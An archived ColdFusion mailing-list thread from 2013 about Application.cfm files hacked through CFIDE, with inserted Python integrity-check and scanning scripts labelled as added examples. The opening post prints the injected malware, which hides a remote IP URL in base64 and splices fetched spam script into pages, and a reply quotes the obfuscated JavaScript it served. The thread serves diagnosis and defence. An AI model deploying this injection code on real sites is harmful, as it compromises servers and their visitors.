Re: Possible Hack?
This little amendment to the footer of the home page will hopefully be enough to help me rest comfortably over the weekend...

<cffile action="read" file="network path\application.cfm" variable="strApplicationTest">
<cfif left(strApplicationTest,14) EQ "<cfapplication">
    <!--- Success! The application file has not been hacked --->
<cfelse>
    <!--- Oops! They have done it again --->
    <cffile action="copy" destination="network path\wwwroot\application.cfm" source="network path\wwwroot\application.bak">
</cfif>

Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354401
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
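The footer check above only looks at the first 14 characters of the file, so an injection placed below the <cfapplication> tag would pass it. As an added example (not code from the post, and not ColdFusion), here is the same idea as a hash-based integrity check in Python that can run from a scheduled task: every Application.cfm under the given webroots is compared byte-for-byte (via SHA-256) with its Application.bak copy, a tampered copy is kept aside for later analysis, and the backup is restored. The directory layout and the .bak / .tampered naming are assumptions for illustration.

```python
"""Added example: hash-based integrity check and restore for Application.cfm.
Assumes a known-good Application.bak sits beside each Application.cfm
(an assumption, not a ColdFusion convention)."""
import hashlib
import shutil
from pathlib import Path


def sha256_of(path: Path) -> str:
    """Hex SHA-256 digest of a file's bytes."""
    return hashlib.sha256(path.read_bytes()).hexdigest()


def check_and_restore(app_file: Path, backup_file: Path, restore: bool = True) -> dict:
    """Compare app_file with backup_file and restore the backup on mismatch.

    Returns a small report dict so a scheduled job can log or alert on it.
    """
    if not backup_file.exists():
        return {"file": str(app_file), "status": "no-backup"}
    if not app_file.exists():
        status = "missing"
    elif sha256_of(app_file) == sha256_of(backup_file):
        return {"file": str(app_file), "status": "clean"}
    else:
        status = "modified"
        # Keep the tampered file for forensics before overwriting it.
        shutil.copy2(app_file, app_file.with_suffix(app_file.suffix + ".tampered"))
    if restore:
        shutil.copy2(backup_file, app_file)
        return {"file": str(app_file), "status": status, "restored": True}
    return {"file": str(app_file), "status": status, "restored": False}


def check_webroots(webroots, restore: bool = True) -> list:
    """Run the check for every Application.cfm (any letter case) under each webroot."""
    reports = []
    for root in webroots:
        for app in Path(root).rglob("*"):
            if app.is_file() and app.name.lower() == "application.cfm":
                reports.append(check_and_restore(app, app.with_suffix(".bak"), restore))
    return reports


if __name__ == "__main__":
    import sys
    # Usage: python appcfm_check.py /path/to/webroot [/another/webroot ...]
    for report in check_webroots(sys.argv[1:]):
        print(report)
```

Unlike the 14-character check, this also catches code appended at the bottom of the file or inserted between existing tags, and the .tampered copy preserves what was injected for the people who later want to look at it.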
RE: Possible Hack?
We got hit with that exact hack on Sunday, and we have all patches and updates installed up to date.

Robert Harrison
Director of Interactive Services
Austin Williams
Advertising | Branding | Digital | Direct
125 Kennedy Drive, Suite 100 | Hauppauge, NY 11788
T 631.231.6600 X 119 F 631.434.7022
http://www.austin-williams.com
Blog: http://www.austin-williams.com/blog
Twitter: http://www.twitter.com/austin_williams

-----Original Message-----
From: Mike K [mailto:afpwebwo...@gmail.com]
Sent: Sunday, February 03, 2013 8:10 PM
To: cf-talk
Subject: Re: Possible Hack?

> I have had this same code added to one of my sites too. (I'm checking now to see if it's just one)
> Did you find out yet where the access point was to modify your code?

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354263
RE: Possible Hack?
Checking, all of the sites we have that use an application.cfm file appear to have gotten this hack. The newer sites that use the application.cfc file appear to be untouched. We had at least three servers hit with this.

Robert Harrison
Director of Interactive Services

-----Original Message-----
From: Robert Harrison [mailto:rob...@austin-williams.com]
Sent: Monday, February 04, 2013 9:38 AM
To: cf-talk
Subject: RE: Possible Hack?

> We got hit with that exact hack on Sunday, and we have all patches and updates installed up to date.

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354264
RE: Possible Hack?
From our side this hack appears to have been inserted yesterday during the Superbowl. The offending IP seems to have come from China. It got three of our sites on different servers. Only sites with an application.cfm file were hit. Sites using application.cfc were untouched.

Robert Harrison
Director of Interactive Services

-----Original Message-----
From: Robert Harrison [mailto:rob...@austin-williams.com]
Sent: Monday, February 04, 2013 9:49 AM
To: cf-talk
Subject: RE: Possible Hack?

> Checking, all of the sites we have that use an application.cfm file appear to have gotten this hack. The newer sites that use the application.cfc file appear to be untouched. We had at least three servers hit with this.

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354265
Re: Possible Hack?
> From our side this hack appears to have been inserted yesterday during the Superbowl. The offending IP seems to have come from China. It got three of our sites on different servers. Only sites with an application.cfm file were hit. Sites using application.cfc were untouched.

I would again strongly recommend that CF be configured so that it can't write to the web root, unless you specifically rely on that feature (CF-based CMS, for example). This will prevent any type of exploit that relies on writing to CF files using CF.

Too many times, I see on this list and elsewhere people focusing on identifying and closing specific exploits, when their time would be best served by preventing the possibility of those exploits working by proper configuration.

I'm not calling you out, Robert, I'm just using your message as a convenient place to reiterate this statement.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
http://training.figleaf.com/

Fig Leaf Software is a Veteran-Owned Small Business (VOSB) on GSA Schedule, and provides the highest caliber vendor-authorized instruction at our training centers, online, or onsite.

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354266
RE: Possible Hack?
> I'm not calling you out, Robert...

Call me out all you want. I'm a programmer. I use a hosting service who does the configuration like most everyone else. I'm forwarding this information to my host.

Thanks

Robert Harrison
Director of Interactive Services

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354267
RE: Possible Hack?
I still have one question. In order to use CFFile to rewrite the application.cfm file, wouldn't they have to get a file up on the site in the first place?

Robert Harrison
Director of Interactive Services

-----Original Message-----
From: Robert Harrison [mailto:rob...@austin-williams.com]
Sent: Monday, February 04, 2013 11:51 AM
To: cf-talk
Subject: RE: Possible Hack?

> Call me out all you want. I'm a programmer. I use a hosting service who does the configuration like most everyone else. I'm forwarding this information to my host.

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354268
Re: Possible Hack?
> I still have one question. In order to use CFFile to rewrite the application.cfm file, wouldn't they have to get a file up on the site in the first place?

Maybe, maybe not. The site could already have a file that does this legitimately that can accept malicious inputs (perhaps in /CFIDE or /cfdocs), or some other channel could be used to write a file with CF commands, such as database commands where the database has the ability to write to the filesystem (another thing that should probably be blocked as a matter of course, if the CF server and the database are even on the same machine).

Dave Watts, CTO, Fig Leaf Software

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354269
Re: Possible Hack?
Not to mention that other technology exploits can allow a hacker into the site, especially on shared hosting.

I know of one site that was almost hacked, but they gave up because they could not run the uploaded code. Now even though this was an inconvenience to the web site, it was still good enough to know that the code was stopped in its tracks. The site runs an MVC framework with SES URLs, which means that the web site didn't use the Application.cfm, but they found a way to create a folder in the webroot and upload the code for cffile and Application.cfm, but as stated they were stopped in their tracks because they had no way to run this code.

--
Regards,
Andrew Scott
WebSite: http://www.andyscott.id.au/
Google+: http://plus.google.com/113032480415921517411

On Tue, Feb 5, 2013 at 4:13 AM, Dave Watts dwa...@figleaf.com wrote:

> Maybe, maybe not. The site could already have a file that does this legitimately that can accept malicious inputs (perhaps in /CFIDE or /cfdocs), or some other channel could be used to write a file with CF commands, such as database commands where the database has the ability to write to the filesystem (another thing that should probably be blocked as a matter of course, if the CF server and the database are even on the same machine).

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354270
RE: Possible Hack?
> I know of one site that was almost hacked, but they gave up because they could not run the uploaded code. Now even though this was an inconvenience to the web site, it was still good enough to know that the code was stopped in its tracks. The site runs an MVC framework with SES URLs, which means that the web site didn't use the Application.cfm, but they found a way to create a folder in the webroot and upload the code for cffile and Application.cfm, but as stated they were stopped in their tracks because they had no way to run this code.

*** FWIW - my site at Hosting A to Z was hacked, also. The hack wasn't working but was causing my site to crash with errors.

Larry Stephens

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354271
Re: Possible Hack?
This same thing happened to us. I traced it back to two cfm files that were created in CFIDE/adminapi/customtags. The first file was created at 9:28 AM, the second at 1:03 AM. The files were named adss.cfm and fusebox.cfm. fusebox.cfm is what scans for application.cfm, index.php, index.html, and index.htm, then injects the code in them. I can post the source for the files if anyone wants to look at it. I still have no idea how they managed to create them though.

> From our side this hack appears to have been inserted yesterday during the Superbowl. The offending IP seems to have come from China. It got three of our sites on different servers. Only sites with an application.cfm file were hit. Sites using application.cfc were untouched.

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354273
RE: Possible Hack?
That is it. Same results. I believe we've locked down against any further use of this method. Thanks, that was helpful.

Robert Harrison
Director of Interactive Services

-----Original Message-----
From: Aaron Frase [mailto:afr...@wddonline.com]
Sent: Monday, February 04, 2013 2:39 PM
To: cf-talk
Subject: Re: Possible Hack?

> This same thing happened to us. I traced it back to two cfm files that were created in CFIDE/adminapi/customtags. The first file was created at 9:28 AM, the second at 1:03 AM. The files were named adss.cfm and fusebox.cfm. fusebox.cfm is what scans for application.cfm, index.php, index.html, and index.htm, then injects the code in them. I can post the source for the files if anyone wants to look at it. I still have no idea how they managed to create them though.

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354276
RE: Possible Hack?
One thing that I do is run a scheduled task every 5 minutes which retrieves my home page via cfhttp and compares it to the previous version. If there is any change, it sends me a text and email telling me of the change.

I added a URL parameter to the scheduled task that, when present, adds a box at the end of my page which displays my personal information (name, address, email) from the database... so that also gets checked for changes.

I have a banner ad that changes on each page load... so I added a way for my script to ignore changes in that banner ad.

A cool test was at midnight on New Year's Eve: I got a text from all of my websites, as the copyright date changed automatically.

This is an early warning system in case of a successful hack. It also would tell me if the database server or web server or CF wasn't working. (The live server is monitored from my testing server.)

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354257
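The monitor described above is a useful pattern beyond ColdFusion, so here it is as an added example in Python (this is not the poster's scheduled task, which was written in CFML). The fetched page is normalized before hashing: the rotating banner, marked here by assumed HTML comments, is replaced with a fixed placeholder so it cannot trigger alerts, whitespace is collapsed, and the SHA-256 of what remains is compared with the fingerprint saved by the previous run. A fetch failure is reported too, which covers the "is CF/the database down" case the post mentions. The URL, the state file path and the banner markers are all assumptions.

```python
"""Added example: home-page change monitor with an ignored banner region.
The banner markers, state file and alert channel are assumptions."""
import hashlib
import re
import urllib.request
from pathlib import Path

# Assumed markers around the part of the page that legitimately changes on each load.
BANNER_RE = re.compile(r"<!-- banner-start -->.*?<!-- banner-end -->", re.DOTALL)


def normalize(html: str) -> str:
    """Replace the rotating banner with a constant and collapse whitespace."""
    html = BANNER_RE.sub("<!-- banner -->", html)
    return re.sub(r"\s+", " ", html).strip()


def page_fingerprint(html: str) -> str:
    """SHA-256 over the normalized page text."""
    return hashlib.sha256(normalize(html).encode("utf-8")).hexdigest()


def fetch(url: str, timeout: float = 15) -> str:
    """Fetch the page; any failure (web server, CF or DB down) raises."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def check_page(html: str, state_file: Path) -> dict:
    """Compare the page's fingerprint with the one stored from the last run.

    Returns {'changed': bool, 'first_run': bool, 'fingerprint': str} and
    saves the new fingerprint; the caller decides how to alert.
    """
    fingerprint = page_fingerprint(html)
    previous = state_file.read_text().strip() if state_file.exists() else None
    state_file.write_text(fingerprint)
    return {
        "changed": previous is not None and previous != fingerprint,
        "first_run": previous is None,
        "fingerprint": fingerprint,
    }


if __name__ == "__main__":
    import sys
    # Usage: python pagewatch.py http://www.example.invalid/ /var/lib/pagewatch/home.sha
    url, state = sys.argv[1], Path(sys.argv[2])
    try:
        result = check_page(fetch(url), state)
    except Exception as exc:  # an unreachable site is worth an alert as well
        print(f"ALERT: could not fetch {url}: {exc}")
        sys.exit(1)
    if result["changed"]:
        print(f"ALERT: {url} changed (fingerprint {result['fingerprint'][:12]})")
```

Run it from a scheduler on a separate host, as the post does, so that a compromised web server cannot also silence its own watchdog; the state file is all it needs between runs.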
RE: Possible Hack?
There are also a number of products out there which will regularly scan your website for malware. Here are a couple.

bluethunderdomains.net/web-site-lock/
http://bluethunderdomains.net/web-site-anti-malware/

Regards
Russ Michaels
www.michaels.me.uk
www.cfmldeveloper.com - Free CFML hosting for developers
www.cfsearch.com - CF search engine

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354259
Re: Possible Hack?
I have had this same code added to one of my sites too. (I'm checking now to see if it's just one)

Did you find out yet where the access point was to modify your code?

Cheers
Mike Kear
Windsor, NSW, Australia
Adobe Certified Advanced ColdFusion Developer
AFP Webworks
http://afpwebworks.com
ColdFusion 9 Enterprise, PHP, ASP, ASP.NET hosting from AUD$15/month

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354262
Possible Hack?
I noticed my CF server started timing out a lot lately. Then I looked at the code and on the Application.cfm page at the top was this code that I didn't put there. Anybody know what this is and how it might have gotten on the Application.cfm pages of the sites on this VPS? Not sure how it got there. Any help in plugging this hole would be appreciated.

<cfif (FindNoCase("Archivver",http_user_agent) EQ 0)>
<cfsavecontent variable="paga">
<CFHTTP METHOD="Get" URL="http://#SERVER_NAME##SCRIPT_NAME#?#QUERY_STRING#" userAgent="Archivver">
<cfset mmy = cfhttp.FileContent>
<cfoutput>#mmy#</cfoutput>
</cfsavecontent>
<CFHTTP METHOD="Get" URL="#hSWaawe('aHR0cDovLzE5OS4xOS45NC4xOTQvY2ZzZXQyLnR4dA==')#">
<cfset cfs = cfhttp.FileContent>
<cfif (FindNoCase("</div>",paga) GT 0)>
<cfset paga = replace(paga, "</div>", "</div>#cfs#", "one")>
<cfelseif (FindNoCase("</table>",paga) GT 0)>
<cfset paga = replace(paga, "</table>", "</table>#cfs#", "one")>
<cfelseif (FindNoCase("</a>",paga) GT 0)>
<cfset paga = replace(paga, "</a>", "</a>#cfs#", "one")>
<cfelse>
<cfset paga = replace(paga, "</body>", "#cfs#</body>", "one")>
</cfif>
<cfoutput>#paga#</cfoutput>
<cfabort>
</cfif>
<cffunction name="hSWaawe">
<cfargument name="HxzcGlk">
<cfset Ypg = ToString(ToBinary(HxzcGlk))>
<cfreturn Ypg>
</cffunction>

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354227
Re: Possible Hack?
> I noticed my CF server started timing out a lot lately. Then I looked at the code and on the Application.cfm page at the top was this code that I didn't put there. Anybody know what this is and how it might have gotten on the Application.cfm pages of the sites on this VPS? Not sure how it got there. Any help in plugging this hole would be appreciated.

The code fetches your page, outputs it, then fetches something from somewhere else and outputs that also. The somewhere else is this URL:

http://199.19.94.194/cfset2.txt

The content of that URL is:

<script language=JavaScript>function zdrViewState() { var a=0,m,v,t,z,x=new Array('9091968376','88879181928187863473749187849392773592878834218896','9977918890','949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a]; t=z=''; for(v=0;v<m.length;){t+=m.charAt(v++); if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a); t='';}}x[l-a]=z;}document.write(''+x[0]+' '+x[4]+'.'+x[2]+'{'+x[1]+'}/'+x[0]+'');}zdrViewState(); </script>

followed by a snippet of spam for payday loans.

There are many things that could have allowed this to be injected. I recommend that you configure CF to run as a specific user account, and give that user account read/execute permissions to your CF files. By default, CF runs as SYSTEM on Windows, which has full control of all local files. It doesn't need this level of permissions. Doing this won't close the vulnerability used to inject the code in the first place, but it will prevent it from doing anything.

Then, once you've done that, read the CF 9 Lockdown Guide and follow its instructions as best you can. You should do this as a matter of course for any CF server install.

http://wwwimages.adobe.com/www.adobe.com/content/dam/Adobe/en/products/coldfusion/pdfs/91025512-cf9-lockdownguide-wp-ue.pdf

Dave Watts, CTO, Fig Leaf Software

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354228
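Two things in this thread lend themselves to a small triage script: the injected code seen in the original post (recognizable by the fake "Archivver" user agent and the ToString(ToBinary(...)) decoder that hides the remote URL in a base64 literal, which Dave decoded by hand above), and Aaron Frase's finding that the dropper files were freshly created .cfm files under CFIDE/adminapi/customtags. The following is an added example in Python, not code from any poster: it scans the file names the dropper targets (application.cfm, index.php, index.html, index.htm) for those markers and decodes any base64 literal passed to a function so the responder sees the remote URL in clear, and separately lists .cfm files under any CFIDE directory modified after a given time. The marker list, the regular expression and the constructed sample are assumptions; the base64 literal in the sample is the one from the posted code.

```python
"""Added example: triage scanner for the Application.cfm injection discussed
in this thread. Marker strings, regex and sample input are assumptions."""
import base64
import re
from pathlib import Path

# Strings seen in the posted injection (case-insensitive match).
INJECT_MARKERS = ("archivver", "tostring(tobinary(")
# A quoted base64 literal passed as a function argument, e.g. f('aHR0...==').
B64_CALL_RE = re.compile(r"\(\s*'([A-Za-z0-9+/=]{16,})'\s*\)")
# File names the dropper was reported to rewrite.
TARGET_NAMES = {"application.cfm", "index.php", "index.html", "index.htm"}

# Constructed sample: a fragment shaped like the posted code, reusing its base64 literal.
SAMPLE_INJECTED = (
    '<cfif (FindNoCase("Archivver",http_user_agent) EQ 0)>'
    '<CFHTTP METHOD="Get" URL="#hSWaawe(\'aHR0cDovLzE5OS4xOS45NC4xOTQvY2ZzZXQyLnR4dA==\')#">'
    "</cfif>"
)


def decode_b64_literals(text: str) -> list:
    """Decode every quoted base64 literal that is passed to a function call."""
    decoded = []
    for literal in B64_CALL_RE.findall(text):
        try:
            decoded.append(base64.b64decode(literal, validate=True).decode("utf-8", "replace"))
        except ValueError:  # not valid base64 after all
            continue
    return decoded


def scan_text(text: str) -> dict:
    """Report which markers hit and what the hidden literals decode to."""
    lowered = text.lower()
    hits = [m for m in INJECT_MARKERS if m in lowered]
    return {
        "infected": bool(hits),
        "markers": hits,
        "decoded": decode_b64_literals(text) if hits else [],
    }


def scan_webroot(root: Path) -> list:
    """Scan the files this injection targets under a webroot; return only hits."""
    results = []
    for path in root.rglob("*"):
        if path.is_file() and path.name.lower() in TARGET_NAMES:
            report = scan_text(path.read_text(errors="replace"))
            if report["infected"]:
                report["file"] = str(path)
                results.append(report)
    return results


def new_cfm_under_cfide(root: Path, since_epoch: float) -> list:
    """List .cfm files under any CFIDE directory modified after since_epoch."""
    found = []
    for path in root.rglob("*.cfm"):
        in_cfide = any(part.lower() == "cfide" for part in path.parts)
        if in_cfide and path.stat().st_mtime > since_epoch:
            found.append(str(path))
    return sorted(found)


if __name__ == "__main__":
    import sys
    import time
    # Usage: python cf_triage.py /path/to/webroot [hours-back, default 48]
    root = Path(sys.argv[1])
    hours = float(sys.argv[2]) if len(sys.argv) > 2 else 48
    print("sample decodes to:", scan_text(SAMPLE_INJECTED)["decoded"])
    for hit in scan_webroot(root):
        print("INJECTED:", hit["file"], hit["markers"], hit["decoded"])
    for cfm in new_cfm_under_cfide(root, time.time() - hours * 3600):
        print("NEW CFIDE FILE:", cfm)
```

The decoded URL is the thing to block at the egress firewall and to search for in proxy logs; the CFIDE listing is where to look for the dropper itself, since the injected page code is only the payload it writes.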
RE: Possible Hack?
Yeah I had figured out what the code did. My main concern is figuring out how they did it and preventing it in the future. I had already done the lockdown stuff many months ago which is why I am kind of baffled. I checked the FTP logs and see nothing in there for those files so the attack would have most likely come in via CF somewhere.

-----Original Message-----
From: Dave Watts [mailto:dwa...@figleaf.com]
Sent: Saturday, February 02, 2013 11:49 AM
To: cf-talk
Subject: Re: Possible Hack?

> There are many things that could have allowed this to be injected. I recommend that you configure CF to run as a specific user account, and give that user account read/execute permissions to your CF files. By default, CF runs as SYSTEM on Windows, which has full control of all local files. It doesn't need this level of permissions. Doing this won't close the vulnerability used to inject the code in the first place, but it will prevent it from doing anything.
>
> Then, once you've done that, read the CF 9 Lockdown Guide and follow its instructions as best you can. You should do this as a matter of course for any CF server install.

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354229
Re: Possible Hack?
You should also check that you have all the hotfixes installed, especially recent ones which plugged a vulnerability that would allow attackers to upload files, which has been blogged and tweeted a lot.

Check your FTP logs for any hacked FTP accounts.

A general security scan against your server would be a good idea, as well as http://hackmycf.com/

On Sat, Feb 2, 2013 at 4:48 PM, Dave Watts dwa...@figleaf.com wrote:

> The code fetches your page, outputs it, then fetches something from somewhere else and outputs that also. The somewhere else is this URL: http://199.19.94.194/cfset2.txt
>
> There are many things that could have allowed this to be injected. I recommend that you configure CF to run as a specific user account, and give that user account read/execute permissions to your CF files. By default, CF runs as SYSTEM on Windows, which has full control of all local files. It doesn't need this level of permissions. Doing this won't close the vulnerability used to inject the code in the first place, but it will prevent it from doing anything.

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354230
RE: Possible Hack?
Yeah, our host Hosting.com sent out an email about those vulnerabilities and we applied the hotfixes for those already. About 6 weeks ago, I think. The only thing I can think of is the cfide is set up as a virtual directory for these sites so they can use things like the FCKEditor etc. Is there another way to enable the use of things like that without just setting the CFIDE directory as a virtual directory for the entire site?

-Original Message-
From: Russ Michaels [mailto:r...@michaels.me.uk]
Sent: Saturday, February 02, 2013 11:58 AM
To: cf-talk
Subject: Re: Possible Hack?

You should also check that you have all the hotfixes installed, especially recent ones which plugged a vulnerability that would allow attackers to upload files, which has been blogged and tweeted a lot. Check your FTP logs for any hacked FTP accounts. A general security scan against your server would be a good idea, as well as http://hackmycf.com/

On Sat, Feb 2, 2013 at 4:48 PM, Dave Watts dwa...@figleaf.com wrote:

>> I noticed my CF server started timing out a lot lately. Then I looked at the code and on the Application.cfm page at the top was this code that I didn't put there. Anybody know what this is and how it might have gotten on the Application.cfm pages of the sites on this VPS? Not sure how it got there. Any help in plugging this hole would be appreciated.
>
> The code fetches your page, outputs it, then fetches something from somewhere else and outputs that also. The somewhere else is this URL:
>
> http://199.19.94.194/cfset2.txt
>
> The content of that URL is:
>
> <script language=JavaScript>function zdrViewState() { var a=0,m,v,t,z,x=new Array('9091968376','88879181928187863473749187849392773592878834218896','9977918890','949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a]; t=z=''; for(v=0;v<m.length;){t+=m.charAt(v++); if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a); t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}zdrViewState();</script>
>
> followed by a snippet of spam for payday loans.
>
> There are many things that could have allowed this to be injected. I recommend that you configure CF to run as a specific user account, and give that user account read/execute permissions to your CF files. By default, CF runs as SYSTEM on Windows, which has full control of all local files. It doesn't need this level of permissions. Doing this won't close the vulnerability used to inject the code in the first place, but it will prevent it from doing anything.
>
> Then, once you've done that, read the CF 9 Lockdown Guide and follow its instructions as best you can. You should do this as a matter of course for any CF server install.
>
> http://wwwimages.adobe.com/www.adobe.com/content/dam/Adobe/en/products/coldfusion/pdfs/91025512-cf9-lockdownguide-wp-ue.pdf
>
> Dave Watts, CTO, Fig Leaf Software
> http://www.figleaf.com/
> http://training.figleaf.com/

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354231
Re: Possible Hack?
> Yeah, I had figured out what the code did. My main concern is figuring out how they did it and preventing it in the future. I had already done the lockdown stuff many months ago, which is why I am kind of baffled. I checked the FTP logs and see nothing in there for those files, so the attack would have most likely come in via CF somewhere.

Does the CF server have permission to write to .cfm files?

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
http://training.figleaf.com/

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354232
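An added example, not code from this thread, of how a defender could find this kind of injection across a webroot: each Application.cfm/.cfc is compared against a SHA-256 baseline taken after a clean deploy, and any <cfhttp> fetching a bare-IP URL like the one Dave describes is flagged. The directory layout, baseline and sample file contents are constructed for the demo.

```python
"""Added example (not from the cf-talk thread): flag Application.cfm/.cfc files
showing the injection discussed above: a SHA-256 baseline check plus a search
for <cfhttp> fetching a bare-IP URL. All sample file contents are constructed."""
import hashlib, os, re, tempfile
from typing import Dict, List, Optional

APP_FILES = {"application.cfm", "application.cfc"}
# Legitimate apps almost never fetch remote content from a bare IP literal.
IP_FETCH = re.compile(
    r'<cfhttp\b[^>]*\burl\s*=\s*["\']https?://(\d{1,3}\.){3}\d{1,3}\b', re.I)

def sha256_text(text: str) -> str:
    return hashlib.sha256(text.encode("utf-8")).hexdigest()

def check_app_file(text: str, expected: Optional[str]) -> List[str]:
    """Findings for one Application file's contents (empty list = clean)."""
    findings = []
    if expected is not None and sha256_text(text) != expected:
        findings.append("hash mismatch against baseline")
    if IP_FETCH.search(text):
        findings.append("cfhttp fetch of a bare-IP URL")
    return findings

def scan_tree(root: str, baseline: Dict[str, str]) -> Dict[str, List[str]]:
    """Walk a webroot; baseline maps relative path -> clean file's SHA-256."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in (n for n in files if n.lower() in APP_FILES):
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, encoding="utf-8", errors="replace") as fh:
                findings = check_app_file(fh.read(), baseline.get(rel))
            if findings:
                report[rel] = findings
    return report

# Constructed samples: a clean file, and one with a remote fetch prepended.
CLEAN = '<cfapplication name="shop" sessionmanagement="yes">\n'
INJECTED = ('<cfhttp url="http://199.19.94.194/cfset2.txt" method="get">\n'
            '<cfoutput>#cfhttp.filecontent#</cfoutput>\n' + CLEAN)

def demo() -> Dict[str, List[str]]:
    """Two sites in a throwaway webroot, baselined when both were clean."""
    root, baseline = tempfile.mkdtemp(), {}
    for site, body in (("siteA", CLEAN), ("siteB", INJECTED)):
        os.makedirs(os.path.join(root, site))
        with open(os.path.join(root, site, "Application.cfm"), "w") as fh:
            fh.write(body)
        baseline[site + "/Application.cfm"] = sha256_text(CLEAN)
    return scan_tree(root, baseline)
```

Run scan_tree against the real webroot with a baseline recorded right after a known-good deploy; a hash mismatch with no matching deployment is the signal, whether or not the regex fires.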
RE: Possible Hack?
http://www.adobe.com/support/security/bulletins/apsb13-03.html

This is the recent fix that affected many of our servers, which led to many sites (and VPS) with that compromise. When Hosting.com (our parent company) sent the notification to their customers there was no hotfix. Our (Hostmysite) admins set up server-wide URL rewrite rules on our shared servers to restrict CFIDE until a patch was in place.

It apparently was the no RDS password (even though disabled) that caused our issue. At least we think.

Byron Mann
Lead Engineer Architect
HostMySite.com

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354250